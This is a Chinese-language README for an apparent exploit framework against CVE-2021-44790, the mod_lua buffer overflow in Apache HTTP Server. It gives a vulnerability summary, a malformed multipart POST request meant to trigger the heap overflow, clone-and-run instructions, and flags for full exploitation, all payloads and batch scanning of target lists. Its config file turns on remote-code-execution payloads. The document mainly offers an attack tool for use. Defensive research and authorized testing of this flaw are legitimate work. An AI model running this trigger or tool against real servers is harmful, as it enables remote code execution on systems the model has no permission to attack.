🔥 CVE-2021-44790 - Apache mod_lua 缓冲区溢出利用
📋 概述
Apache mod_lua 缓冲区溢出利用 是一个针对 CVE-2021-44790 的高级企业级利用平台。CVE-2021-44790 是 Apache HTTP Server 2.4.x mod_lua 模块中的一个严重缓冲区溢出漏洞。该框架提供全面的指纹识别、智能脚本发现、多阶段扫描和专业报告功能,检测置信度高达 95% 以上。
⚡ 主要功能
| 功能 | 描述 |
|---|
| 🔍 高级指纹识别 | Apache 版本、mod_lua、操作系统、架构、WAF、CDN、容器、云服务商检测 |
| 🎯 智能发现 | 7 种以上发现技术,包括 robots.txt、sitemap、HTML 解析、JavaScript 提取 |
| 💥 多阶段扫描 | 连接 → 指纹识别 → 发现 → 验证 → 利用 → 报告 |
| 🧩 可扩展插件系统 | 便于为未来的 CVE 开发插件 |
| 🌐 智能 HTTP 引擎 | 连接池、重试、HTTP/2 支持、速率限制 |
| 📊 综合报告 | JSON、HTML、Markdown、PDF,附带交互式仪表板 |
| 🎨 美观的终端界面 | 基于 Rich 库的进度条、表格和彩色输出 |
| 💾 研究数据库 | SQLite 存储,支持完整扫描历史和查询 |
| 📸 截图捕获 | 自动捕获网页截图以收集证据 |
| 🚀 高性能 | 20+ 并发线程,100+ 连接池 |
🎯 漏洞详情
| 属性 | 值 |
|---|
| CVE 编号 | CVE-2021-44790 |
| 漏洞类型 | 缓冲区溢出(整数下溢) |
| 受影响软件 | Apache HTTP Server 2.4.0 至 2.4.51 |
| 修复版本 | Apache HTTP Server 2.4.52 及更高版本 |
| 受影响组件 | mod_lua 模块 |
| 攻击向量 | 网络(远程) |
| CVSS 评分 | 9.8(严重) |
| 机密性影响 | 高 |
| 完整性影响 | 高 |
| 可用性影响 | 高 |
| 利用成熟度 | 已有概念验证(PoC) |
技术描述
该漏洞存在于 mod_lua 模块处理 multipart/form-data 请求时。lua_request_parsebody() 函数中的整数下溢可能导致基于堆的缓冲区溢出,从而可能允许远程代码执行。
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4
4
Content-Disposition: form-data; name="name"
0
4
📸 截图
🚀 快速开始
安装
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 exploit.py --version
基本用法
# Quick vulnerability scan
python3 exploit.py http://target.com
# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose
# Generate all reports
python3 exploit.py http://target.com --report all
# Research mode with database
python3 exploit.py http://target.com --research
📋 详细用法
命令行选项
python3 exploit.py [TARGET] [OPTIONS]
| 选项 | 描述 | 示例 |
|---|
TARGET | 目标 URL | http://target.com |
--config FILE | 配置文件 | --config config.yaml |
--threads N | 线程数 | --threads 30 |
--timeout N | 请求超时(秒) | --timeout 15 |
--proxy URL | 代理 URL | --proxy http://127.0.0.1:8080 |
--verbose | 详细输出 | --verbose |
--scan-only | 仅扫描,不进行利用 | --scan-only |
--exploit | 启用利用 | --exploit |
--all-payloads | 使用所有载荷 | --all-payloads |
--report FORMAT | 报告格式(json/html/markdown/all) | --report all |
--output DIR | 输出目录 | --output /path/to/reports/ |
--research | 启用研究模式 | --research |
--database FILE | 数据库路径 | --database luastorm.db |
--screenshot | 捕获截图 | --screenshot |
--batch FILE | 包含目标的批处理文件 | --batch targets.txt |
--query SQL | 执行数据库查询 | --query "SELECT * FROM targets" |
示例
1. 基础漏洞评估
python3 exploit.py https://example.com --verbose --report all
2. 企业环境扫描
python3 exploit.py https://internal-server.com \
--proxy http://proxy.corp.com:8080 \
--threads 10 \
--timeout 15 \
--verbose \
--report all \
--output /var/log/security/
3. 完整渗透测试
python3 exploit.py https://client.com \
--threads 30 \
--timeout 10 \
--exploit \
--all-payloads \
--report all \
--screenshot \
--research \
--verbose \
--output /pentest/client_name/
4. 批量扫描
python3 exploit.py --batch targets.txt --config config.yaml
5. 数据库查询
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"
# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"
⚙️ 配置
config.yaml
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------
# Scan Settings
threads: 20 # Concurrent threads
timeout: 10 # Request timeout in seconds
retries: 3 # Number of retry attempts
rate_limit: 10 # Requests per second
max_depth: 3 # Directory traversal depth
follow_redirects: true # Follow HTTP redirects
verify_ssl: false # Verify SSL certificates
# Network Settings
proxy: null # Proxy URL
http2: true # Enable HTTP/2 support
user_agent: random # User-Agent (random/specific)
save_packets: false # Save raw network packets
# Analysis Settings
research_mode: true # Enable research database
verbose: false # Verbose output
scan_only: false # Scan without exploitation
exploit: false # Enable exploitation
all_payloads: false # Use all payloads
# Payload Settings
payloads:
detection: true
memory: true
rce: true
dos: false
# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports
# Database Settings
database_path: luastorm.db
database_retention: 365
# Directory Settings
logs_dir: logs
screenshots_dir: screenshots
📊 报告
HTML 仪表板
- 交互式图表和表格
- 目标指纹可视化
- 脚本发现摘要
- 载荷执行时间线
- 漏洞评估
- 风险评分
JSON 报告
{
"scan_id": "a1b2c3d4",
"target": {
"url": "https://example.com",
"hostname": "example.com",
"port": 443
},
"vulnerable": true,
"risk_level": "Critical",
"scan_duration": 45.23,
"timestamp": "2026-08-04T15:45:23"
}
Markdown 报告
- 人类可读的文档
- 表格化数据
- 易于共享和嵌入
- 便于版本控制
🗄️ 数据库结构